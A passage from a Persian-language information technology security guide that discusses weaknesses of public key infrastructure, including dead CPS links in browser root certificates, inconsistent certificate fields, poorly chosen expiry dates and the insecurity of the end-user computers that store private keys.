ﻫﻢ ﻣﺜﻞ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻭ ﮔﺬﺭﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﻭﻟﺘﻬﺎ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺩﻳﺪﮔﺎﻩ ﻗﺎﺑﻞ ﺑﺮﺭﺳﻲ ﺑﻮﺩ ،ﺍﻣﺎ ﻫﺮﭼﻪ ﺑﻮﺩ ﺗﺎ ﻛﻨﻮﻥ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺍﺳـﺖ.
ﺷﺮﻛﺘﻬﺎﻳﻲ ﻣﺜﻞ VeriSignﻣﻴﻠﻴﻮﻧﻬﺎ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﻣﻌﻴﻦ ﻛﺮﺩﻥ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻣﻀﺎﻱ ﻋﻼﻳﻢ ﺍﻳـﻦ
ﮔﻮﺍﻫﻲﻫﺎ ﺩﺭ ﻣﻘﻴﺎﺱ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻳـﻦ ﺳﻠـﺴﻪ ﻣﺮﺍﺗـﺐ ﺍﻋﺘﻤـﺎﺩ -ﻣﺜـﻞ ﺳﻠـﺴﻠﻪ ﻣﺮﺍﺗﺒـﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ -ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺳﻂ ﺑﻴﺶ ﺍﺯ ﺻﺪ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﺍﻣـﺎ
ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺧﺼﻮﺻﻲ ،ﻭ ﻧﻪ ﺑﻮﺳﻴﻠﻪ ﺩﻭﻟﺖ .ﻛﻠﻤﻪ "ﻋﻤﻮﻣﻲ" ﺩﺭ PKIﻧﻴﺰ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ
ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ،ﻭ ﻧﻪ ﺑﻪ ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺑﺼﻮﺭﺕ ﻛﻠﻲ.
ﻣﺸﻜﻼﺕ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ
ﻫﺮﭼﻨﺪ ﺑﺎﻋﺚ ﺗﺄﺳﻒ ﺍﺳﺖ ،ﺍﻣﺎ ﺍﮔﺮ ﺑﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺻﻠﻲ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ Internet Explorerﻭ Netscape Navigator
ﻧﮕﺎﻩ ﺩﻗﻴﻘﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﺩﺭ ﺧﻮﺍﻫﻴﺪ ﻳﺎﻓﺖ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎ ﻭ ﻣﺸﻜﻼﺕ ﻛﻨﺘﺮﻝ ﻛﻴﻔﻴﺖ ﺑﺰﺭﮔﻲ ﺩﺭ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﻛﻮﺗﺎﻩ ﺑﻮﺩﻥ ﺩﻭﺭﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺎﺳﺖﻫﺎﻱ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ
ﻼ ﮔـﻮﺍﻫﻲ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ CPSﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﻣﺜ ﹰ
ﺧﻮﺩ ﺍﻣﻀﺎﻱ Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C.ﻛـﻪ
ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﺮﻧﺎﻣﺔ Internet Explorer 5.0ﺗﻮﺯﻳﻊ ﺷﺪﻩ ،ﺍﺯ ﮊﻭﺋﻦ ۱۹۹۹ﺗﺎ ﮊﻭﺋﻦ ۲۰۰۹ﻣﻌﺘﺒﺮ ﺍﺳﺖ .ﺍﻳﻦ ﮔـﻮﺍﻫﻲ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨـﺪ ﻛـﻪ
CPSﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ http://www.correduriapublica.org.mx/RCD/dpcﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ ،ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻳـﻦ
URLﺣﺪﺍﻗﻞ ﺩﺭ ﺁﻭﺭﻳﻞ ۲۰۰۱ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﺒﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺮﺍﻱ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻛﻪ ﻫﻤﺔ URLﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮐﻪ ﺻﺎﺩﺭ ﮐﺮﺩﻩ ﺁﻣﺪﻩ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻛﻨﺪ .ﺍﮔﺮ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ CPS ،ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻋﻮﺽ ﻛﻨﺪ ،ﺁﻧﮕﺎﻩ ﻫﺮ CPSﺑﺎﻳﺪ ﺍﺯ ﻳـﻚ URLﻳﻜﺘـﺎ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﺍﻳـﻦ
ﻲ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻛﻪ ﺑﻪ ﺁﻥ CPSﺑﺎﺯﻣﻲﮔﺮﺩﺩ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﭼـﻮﻥ ﻣﻌﻨـﺎﻱ ﺣﻘـﻮﻗﻲ ﻭ
ﻟﻴﻨﻜﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫ ﹺ
ﻗﺎﻧﻮﻧﻲ ﮔﻮﺍﻫﻲ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ CPSﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ،ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻌﻨﺎﻱ ﻳﻚ ﺍﻣـﻀﺎ ﭼﻨـﺪ
ﺳﺎﻝ ﺑﻌﺪ ﺍﺯ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺳﺆﺍﻝ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻗﺎﻋﺪﺗﹰﺎ URLﻫﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻳﻚ ﺑﺎﺯﺓ ﺣﺪﺍﻗﻞ ۲۰ﺳﺎﻟﻪ ﻓﻌﺎﻝ ﺑﻤﺎﻧﻨﺪ.
٣٢٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻧﺎﭘﺎﻳﺪﺍﺭﻱﻫﺎ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ
ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺩﺭ Netscape Navigatorﻭ Internet Explorerﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﻪﺍﻱ ﺑﺮﺍﻱ ﺯﻳﺮﺳـﺎﺧﺖ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺎﻥ ﻭ ﻋﻘﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ .ﺁﻧﭽﻪ ﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﭘﻴﭽﻴﺪﻩ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺖ ﺍﺳﺖ ﻛـﻪ ﺭﻭﺷـﻬﺎﻱ
ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﺍﺳﺖ .ﺑﻪ ﺑﻴﺎﻥ ﺩﻗﻴﻘﺘﺮ ،ﻓﻴﻠﺪ "ﻣﻮﺿﻮﻉ" ،ﻛﻪ ﺑﺎ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ ١٤٦ﺧـﻮﺩ ﻣﻌـﺮﻑ
ﻼ
ﺻﺎﺩﺭﻛﻨﻨﺪﻩ ﺍﺳﺖ ﻫﻴﭻ ﻗﺎﻟﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺭﺩ ،ﻭ ﮔﻮﺍﻫﻲ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺘﻔﺎﻭﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﺎﻣﻞ ﺻـﻔﺎﺕ ﻣﻤﻴـﺰﺓ ﻛـﺎﻣ ﹰ
ﻣﺘﻔﺎﻭﺗﻲ ﺑﺎﺷﺪ .ﭼﻨﺎﻧﭽﻪ ﮔﻮﺍﻫﻲ ﺑﺨﻮﺍﻫﺪ ﺩﺭ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ ﺗﻮﺳﻂ ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺮﺩﺍﺯﺵ ﺷﻮﺩ ،ﺍﻟﺰﺍﻡ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ ﻭ
ﻓﻴﻠﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺣﻴﺎﺗﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﮔﺮ ﺍﻳﻦ ﺍﻟﺰﺍﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﻪ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻫﻤـﺔ ﺍﻧـﻮﺍﻉ ﻭ
ﻗﺎﻟﺒﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭ ﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﺎﻣﻬﺎﻱ ﻣﺸﺮﻭﻉ ﺑﺼﻮﺭﺕ ﺑﺼﺮﻱ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﻌﺘﺒﺮ ﺭﺍ ﺍﺯ
ﮔﻮﺍﻫﻲﻫﺎﻱ ﻧﺎﻣﻌﺘﺒﺮ ﺗﺸﺨﻴﺺ ﺩﺍﺩ.
ﺗﺎﺭﻳﺦﻫﺎﻱ ﺍﻧﻘﻀﺎﻱ ﻏﻴﺮ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ
ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﻣﺮﻭﺭﮔﺮ Netscape Navigatorﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺗﻮﺯﻳﻊ ﺷﺪ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻳﺸﺎﻥ ﺑﻴﻦ ۲۵ﻭ ۳۱ﺩﺳﺎﻣﺒﺮ ۱۹۹۹ﺑﻮﺩ.
ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻓﺖ ﻫﻤﭽﻨﺎﻥ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ .ﺩﺭ ﭘﺎﻳـﺎﻥ ﺳـﺎﻝ ۱۹۹۹ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ
ﻣﺤﺼﻮﻻﺕ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺩﺭ ﺧﻮﺩ ﺩﺍﺷﺘﻨﺪ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻧﺪ .ﻫﺮﭼﻨـﺪ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺑﺎﻳـﺪ ﻭﺟـﻮﺩ ﻣـﻲﺩﺍﺷـﺖ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺑـﺴﺎﺩﮔﻲ
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ downloadﻛﺮﺩ ،ﺍﻣﺎ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻭﻟﻴﻪ ،ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺻـﻴﻪ ﺷـﺪ ﻛـﻪ ﻛـﻞ
ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺑﻪ ﺁﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻮﺩﻧﺪ ﻧﺎﮔﻬﺎﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩ ﺑﻮﺩ ﻧﺎﺭﺍﺿﻲ ﺑﻮﺩﻧﺪ.
ﭘﺲ ﺍﺯ ﺍﻳﻦ ﺗﺠﺮﺑﻪ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﺼﻤﻴﻤﻲ ﮔﺮﻓﺘﻨﺪ ﻛﻪ ﻣﻮﺟﺐ ﺷﺪ ﺍﺯ ﺳﻮﻳﻲ ﺩﻳﮕﺮ ﻣﺮﺗﻜﺐ ﺍﺷﺘﺒﺎﻩ ﺷﻮﻧﺪ .ﺁﻧﻬﺎ ﺷﺮﻭﻉ ﺑﻪ
ﺗﻮﺯﻳﻊ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻧﻬﺎﻱ ﺍﻧﻘﻀﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻛﺮﺩﻧﺪ .ﺗﻤﺎﻡ ﮔﻮﺍﻫﻲﻫـﺎﻱ ﺗﻮﺯﻳـﻊﺷـﺪﻩ ﺑـﻪ ﻫﻤـﺮﺍﻩ ،Internet Explorer 5.0
ﮔﻮﺍﻫﻲﻫﺎﻱ ۱۰۲۴ﺑﻴﺘﻲ RSAﻫﺴﺘﻨﺪ ،ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻴﺶ ﺍﺯ ﻧﻴﻤﻲ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺗـﺎﺭﻳﺦ ﺍﻧﻘـﻀﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻌـﺪ ﺍﺯ ۱ﮊﺍﻧﻮﻳـﻪ ۲۰۱۹
ﺩﺍﺭﻧﺪ VeriSign .ﻧﻴﺰ ﻫﺸﺖ ﮔﻮﺍﻫﻲ ﺑﺎ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻱ ﺳﺎﻝ ۲۰۲۸ﻫﻤﺮﺍﻩ Internet Explorer 5.5ﺗﻮﺯﻳﻊ ﻛﺮﺩﻩ ﺍﺳـﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﺘﺨﺼﺼﻴﻦ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ RSAﻫﺎﻱ ۱۰۲۴ﺑﻴﺘﻲ ﺩﺭ ﺁﻥ ﺗﺎﺭﻳﺦ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻤﻦ ﻣﺤﺴﻮﺏ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ.
ﻣﻮﺿﻮﻋﺎﺕ ﺧﻂ ﻣﺸﻲ PKI
ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﮔﺴﺘﺮﺩﻩ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘﺬﻳﺮ ﺍﺳﺖ .ﺗﻌﺪﺍﺩ ﺣﻮﺍﺩﺙ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ ﻭ ﻧﻴـﺎﺯ ﺑـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺯﻳﺎﺩ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ PKIﮔﺴﺘﺮﺩﺓ ﺍﻣﺮﻭﺯ ﺑﻨﻈﺮ ﺩﻭﺭﺗﺮ ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ۱۹۹۰ﻣـﻲﺭﺳـﺪ.
ﻼ
ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﺑﺮﺍﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺿﻮﻋﻲ ﻛﺎﻣ ﹰ
ﻲ ﺍﻧﺘﻬﺎﻱ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺼﺪﻳﻖ ﻧﺸﻮﺩ ،ﻫﻤﻴﻦ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ
ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟ ﹺ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺍﻳﻦ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺭﺩ ﺟﺰ ﺍﻳﻨﻜﻪ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﻧﻬﺎﻳـﺖ ﺳـﺎﺩﮔﻲ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻭ
ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ.
ﺩﺭ ﺻﻔﺤﺔ ﺑﻌﺪ ،ﺗﻌﺪﺍﺩ ﻣﻌﺪﻭﺩﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻦ PKIﻭﺍﻗﻌﻲ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﺷﻮﺩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ،ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ
ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺍﺛﺒﺎﺗﻲ ﺑﺮﺍﻱ ﻫﻮﻳﺘﻬﺎ ﻧﻴﺴﺘﻨﺪ .ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺼﻮﺭﺕ
ﺗﺼﺎﺩﻓﻲ ﺗﻮﻟﻴﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﺸﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻜﻨﻔﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻛﻞ ﻳﮏ ﻓﺮﺁﻳﻨﺪ ﻣﻮﺭﺩ ﺗﺮﺩﻳﺪ ﻭﺍﻗﻊ ﻣﻲﮔـﺮﺩﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻢ ﺗﻮﻟﻴﺪ ﻭ ﻫﻢ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮ ﻧﻬﺎﻳﻲ ﺭﺍﻳﺎﻧﻪ ﺍﺳـﺖ ،ﻭ ﻣـﻲﺩﺍﻧـﻴﻢ ﺑﻴـﺸﺘﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ Netscape
Navigatorﻳﺎ Internet Explorerﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﺍﻳﻤﻦ ﻧﻴـﺴﺘﻨﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺭﺍ ﻛـﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ
146 Distinguished Name
٣٢٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
downloadﻛﺮﺩﻩﺍﻧﺪ ﺑﺪﻭﻥ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﺍﺯ ﻣﻨﺒﻊ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ .ﺑﻌـﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﻫـﺴﺘﻨﺪ ،ﺑﺮﺧـﻲ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ downloadﺷﺪﻩ ﺣﺎﻭﻱ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ ،ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺭﺍﻳﺞ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻱ
ﻫﺴﺘﻨﺪ ﻭ ﺻﺪﻫﺎ ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﮔﺬﺷﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺻﺎﺩﺭ ﺷﺪﻩ ﺍﺳﺖ .ﭘﺲ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣﺘـﺼﻞ ﺑـﻪ
ﺷﺒﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﻧﺰﺩﻳﻚ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ .ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩ ﺍﺯ ﻛﺎﺭﺗﺨﻮﺍﻧﻬﺎ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ
